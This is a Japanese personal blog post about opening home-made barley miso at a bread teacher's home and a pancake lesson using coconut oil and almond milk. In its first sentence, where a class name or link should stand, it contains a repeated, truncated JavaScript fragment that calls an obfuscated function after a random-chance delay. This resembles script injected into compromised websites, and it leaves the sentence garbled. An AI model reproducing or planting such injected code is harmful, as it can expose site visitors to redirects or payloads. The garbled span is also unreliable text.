こんにちは。こんやです。
江東区でandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbaking/”>andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and bakingというパン教室をしているまい先生のお宅で、春に仕込んだ味噌が出来たよ~♪と言うので、味噌開きに行ってきました。
実家で手づくり味噌で育った私は馴染みの味です。
今回は麦を入れたのでほんのり甘みのあるしっかりとした香りの味噌に出来上がりました。
シンプルにきゅうりとトマトにつけて試食すると、おいしぃぃぃ~!!
また来年も挑戦したいです!
その後は、Simple Dimple KITCHENのまどか先生によるパンケーキレッスンをしました。
ココナッツオイルとアーモンドミルクを使った、ふわふわもちもちのパンケーキの作り方を教わりました。
添えるクリームはヨーグルト入りで、生クリームがくどくて苦手という私にはぴったり!
パンケーキにたっぷりつけて頂きました。
お二人ともご自宅で少人数で教室を開いています。
体に優しくておいしいパンとお料理を教えてくれますので、興味のある方はブログ・HPのぞいてみて下さいね。
お子様連れでも大丈夫ですよ~。